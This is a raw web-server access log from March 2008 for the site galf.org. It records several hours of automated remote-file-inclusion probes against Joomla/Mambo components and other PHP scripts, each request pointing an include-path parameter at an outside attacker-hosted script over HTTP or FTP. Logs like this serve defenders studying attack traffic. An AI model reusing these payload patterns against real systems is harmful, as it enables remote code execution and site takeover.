69.93.48.162 - - [16/Mar/2008:18:36:20 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:36:20 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:36:20 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:37:05 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:37:06 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:37:06 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:37:49 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:37:49 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:18:38:04 -0700] "GET //oneadmin/config.php?path[docroot]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.86.43.164 - - [16/Mar/2008:18:38:04 -0700] "GET /logs/access_070716.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:38:20 -0700] "GET /logs/access_071217.log/main.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:38:20 -0700] "GET /main.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
74.86.43.164 - - [16/Mar/2008:18:38:20 -0700] "GET /logs/access_071224.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:18:38:20 -0700] "GET /logs/main.php?x=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:39:21 -0700] "GET /logs/access_071217.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:39:29 -0700] "GET /index.php?configFile=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:40:43 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
212.227.48.50 - - [16/Mar/2008:18:40:43 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
124.217.247.200 - - [16/Mar/2008:18:40:44 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codeduc.cl/documentos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:42:41 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:42:41 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
75.126.141.170 - - [16/Mar/2008:18:43:20 -0700] "GET //main.php?sayfa=http://voicesfrommexico.com/port/var_cache/backup/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
75.126.141.170 - - [16/Mar/2008:18:43:20 -0700] "GET /logs//main.php?sayfa=http://voicesfrommexico.com/port/var_cache/backup/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.galf.org"
4.79.181.230 - - [16/Mar/2008:18:45:26 -0700] "GET /logs/access_080225.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.230 - - [16/Mar/2008:18:45:26 -0700] "GET /logs/access_080225.log//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.230 - - [16/Mar/2008:18:45:26 -0700] "GET //admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.230 - - [16/Mar/2008:18:45:26 -0700] "GET //admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.230 - - [16/Mar/2008:18:45:26 -0700] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.230 - - [16/Mar/2008:18:45:26 -0700] "GET /logs//admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
147.202.47.31 - - [16/Mar/2008:18:45:37 -0700] "GET /index2.php?page=http://www.zojoma.com/gjestebok/img/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
147.202.47.31 - - [16/Mar/2008:18:45:37 -0700] "GET /logs/index2.php?page=http://www.zojoma.com/gjestebok/img/response?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:45:47 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.83.30.6 - - [16/Mar/2008:18:47:02 -0700] "GET /logs/access_070827.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.semfrance.com/modules/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.83.30.6 - - [16/Mar/2008:18:47:03 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.semfrance.com/modules/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.103.130.166 - - [16/Mar/2008:18:47:20 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:47:42 -0700] "GET /logs/access_071203.log//theme.php?THEME_DIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:47:42 -0700] "GET /logs//theme.php?THEME_DIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.118.102.153 - - [16/Mar/2008:18:48:00 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
87.118.102.153 - - [16/Mar/2008:18:48:00 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:48:02 -0700] "GET /logs/access_070820.log//theme.php?THEME_DIR=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.217.247.200 - - [16/Mar/2008:18:48:03 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codeduc.cl/documentos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.217.247.200 - - [16/Mar/2008:18:48:04 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codeduc.cl/documentos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:48:23 -0700] "GET /logs/access_070917.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
124.217.247.200 - - [16/Mar/2008:18:48:23 -0700] "GET /logs/access_071014.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.codeduc.cl/documentos/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:48:24 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:48:24 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:48:42 -0700] "GET /logs/access_071022.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:48:42 -0700] "GET //admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:48:42 -0700] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.14.51.216 - - [16/Mar/2008:18:48:53 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.galf.org"
84.14.51.216 - - [16/Mar/2008:18:48:54 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
67.228.60.242 - - [16/Mar/2008:18:48:55 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
67.228.60.242 - - [16/Mar/2008:18:48:55 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:49:44 -0700] "GET /logs/access_071014.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:49:44 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:49:45 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.22.10.105 - - [16/Mar/2008:18:49:58 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.103.130.166 - - [16/Mar/2008:18:50:07 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
125.246.173.66 - - [16/Mar/2008:18:51:02 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
125.246.173.66 - - [16/Mar/2008:18:51:03 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:18:51:09 -0700] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:52:09 -0700] "GET /logs/access_071224.log//aedating4CMS.php?dir[inc]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:52:09 -0700] "GET //aedating4CMS.php?dir[inc]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:18:52:15 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.83.30.6 - - [16/Mar/2008:18:52:34 -0700] "GET /logs/access_071231.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.semfrance.com/modules/safe? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:53:05 -0700] "GET /logs/access_071231.log//aedating4CMS.php?dir[inc]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:53:20 -0700] "GET /logs/access_070820.log//rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:53:20 -0700] "GET //rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:53:20 -0700] "GET /logs//rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:53:35 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:53:35 -0700] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:53:35 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:53:35 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:53:37 -0700] "GET /logs/access_070917.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:54:03 -0700] "GET /logs/access_070716.log//database.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:54:03 -0700] "GET //database.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:54:03 -0700] "GET /logs//database.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:54:14 -0700] "GET /logs/access_071015.log//rsgallery.html.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:54:15 -0700] "GET /logs/access_070820.log//database.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:18:54:28 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:18:54:28 -0700] "GET /akocomments.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:18:54:30 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:18:54:30 -0700] "GET /modules/My_eGallery/index.php?basepath=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
196.33.39.5 - - [16/Mar/2008:18:54:34 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
196.33.39.5 - - [16/Mar/2008:18:54:34 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.geocities.com/helloooaja/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:18:54:39 -0700] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
80.55.150.108 - - [16/Mar/2008:18:54:43 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:56:19 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:18:56:20 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:56:39 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.34 - - [16/Mar/2008:18:57:45 -0700] "GET /logs/access_080218.log//index.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.217.247.200 - - [16/Mar/2008:18:57:55 -0700] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//components/com_rwcards/alba.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
124.217.247.200 - - [16/Mar/2008:18:57:56 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fansvictorvaldes.es//components/com_rwcards/alba.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
4.79.181.229 - - [16/Mar/2008:18:58:33 -0700] "GET /logs/access_070730.log//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.229 - - [16/Mar/2008:18:58:34 -0700] "GET //?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.229 - - [16/Mar/2008:18:58:34 -0700] "GET /logs//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 6663 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.229 - - [16/Mar/2008:18:58:34 -0700] "GET /logs/access_070730.log//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.229 - - [16/Mar/2008:18:58:34 -0700] "GET //?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
4.79.181.229 - - [16/Mar/2008:18:58:34 -0700] "GET /logs//?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 200 6663 "-" "libwww-perl/5.803" "www.galf.org"
82.103.130.166 - - [16/Mar/2008:18:58:42 -0700] "GET /logs/access_071022.log///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.103.130.166 - - [16/Mar/2008:18:58:42 -0700] "GET /logs///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.246.21.243 - - [16/Mar/2008:18:58:56 -0700] "GET /logs/access_071008.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.246.21.243 - - [16/Mar/2008:18:58:56 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:18:58:56 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.246.21.243 - - [16/Mar/2008:19:02:25 -0700] "GET /logs/access_071015.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.103.130.166 - - [16/Mar/2008:19:02:26 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:19:02:54 -0700] "GET /[Scriptftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.2.252.37 - - [16/Mar/2008:19:02:54 -0700] "GET /[Scriptftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.55.150.108 - - [16/Mar/2008:19:05:26 -0700] "GET ///components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:19:07:25 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:19:07:26 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:19:08:09 -0700] "GET /logs/access_070827.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:19:08:09 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:19:08:21 -0700] "GET /logs/access_071217.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.214.230 - - [16/Mar/2008:19:08:59 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.103.130.166 - - [16/Mar/2008:19:09:16 -0700] "GET /logs/access_080114.log//components/com_simpleboard/file_upload.php?sbp=http://gcd.jveuger.nl/site/templates/waterandstone800/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:19:11:21 -0700] "GET /main.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
